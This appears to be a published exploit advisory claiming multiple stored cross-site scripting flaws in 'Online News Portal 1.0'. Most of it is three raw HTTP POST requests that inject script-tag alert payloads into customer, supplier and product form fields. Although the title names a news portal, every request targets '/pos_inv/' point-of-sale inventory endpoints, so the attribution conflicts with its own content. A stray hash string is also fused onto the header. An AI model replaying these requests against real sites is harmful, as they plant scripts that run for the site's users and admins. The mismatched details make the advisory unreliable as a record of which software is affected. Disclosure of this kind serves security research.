Online News Portal version 1.0 suffers from multiple persistent cross site scripting vulnerabilities. These are additional findings from the author of the earlier discovery of persistent cross site scripting in this version.
8666e5d4aeedf826ccfdb782f7f85411# Exploit Title: Online News Portal | Multiple Stored Cross-Site Scripting
# Exploit Author: Richard Jones
# Date: 2021-03-18
# Vendor Homepage: https://www.sourcecodester.com/php/14741/online-news-portal-using-phpmysqli-free-download-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14741&title=Online+News+Portal+using+PHP%2FMySQLi+with+Source+Code+Free+Download
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
# Multipul endpoints on the application suffer from Stored XSS injection as a user/supplier and admin. Scripts execute on page load.
# One
POST /pos_inv/admin/addcustomer.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------26863080316712198253766739741
Content-Length: 661
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/pos_inv/admin/customer.php
Cookie: PHPSESSID=cb9r4bs1p4mqmt98nd4o3mtavm
Upgrade-Insecure-Requests: 1
-----------------------------26863080316712198253766739741
Content-Disposition: form-data; name="name"
<script>alert(`Stored XSS`)</script>
-----------------------------26863080316712198253766739741
Content-Disposition: form-data; name="address"
<script>alert(`Stored XSS`)</script>
-----------------------------26863080316712198253766739741
Content-Disposition: form-data; name="contact"
<script>alert(`Stored XSS`)</script>
-----------------------------26863080316712198253766739741
Content-Disposition: form-data; name="username"
<script>alert(`Stored XSS`)</script>
-----------------------------26863080316712198253766739741
Content-Disposition: form-data; name="password"
<script>alert(`Stored XSS`)</script>
-----------------------------26863080316712198253766739741--
# Two
http://127.0.0.1/pos_inv/admin/supplier.php
POST /pos_inv/admin/edit_supplier.php?id=4 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 176
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/pos_inv/admin/supplier.php
Cookie: PHPSESSID=cb9r4bs1p4mqmt98nd4o3mtavm
Upgrade-Insecure-Requests: 1
name=Dell+Computer+Corporation&address=%3Cscript%3Ealert%28%60Stored+XSS%60%29%3C%2Fscript%3E&contact=1-800-WWW-DELL&username=supplier&password=fa3ddb86f38fb6a8284636249f6551aa
# Three
http://127.0.0.1/pos_inv/admin/product.php
POST /pos_inv/admin/edit_product.php?id=12 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------11435260685310908573266876009
Content-Length: 844
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/pos_inv/admin/product.php
Cookie: PHPSESSID=cb9r4bs1p4mqmt98nd4o3mtavm
Upgrade-Insecure-Requests: 1
-----------------------------11435260685310908573266876009
Content-Disposition: form-data; name="name"
ACER Aspire GX-781 Gaming PC <script>alert(1)</script>
-----------------------------11435260685310908573266876009
Content-Disposition: form-data; name="category"
2
-----------------------------11435260685310908573266876009
Content-Disposition: form-data; name="supplier"
0
-----------------------------11435260685310908573266876009
Content-Disposition: form-data; name="price"
749.99
-----------------------------11435260685310908573266876009
Content-Disposition: form-data; name="qty"
1000
-----------------------------11435260685310908573266876009
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream
-----------------------------11435260685310908573266876009--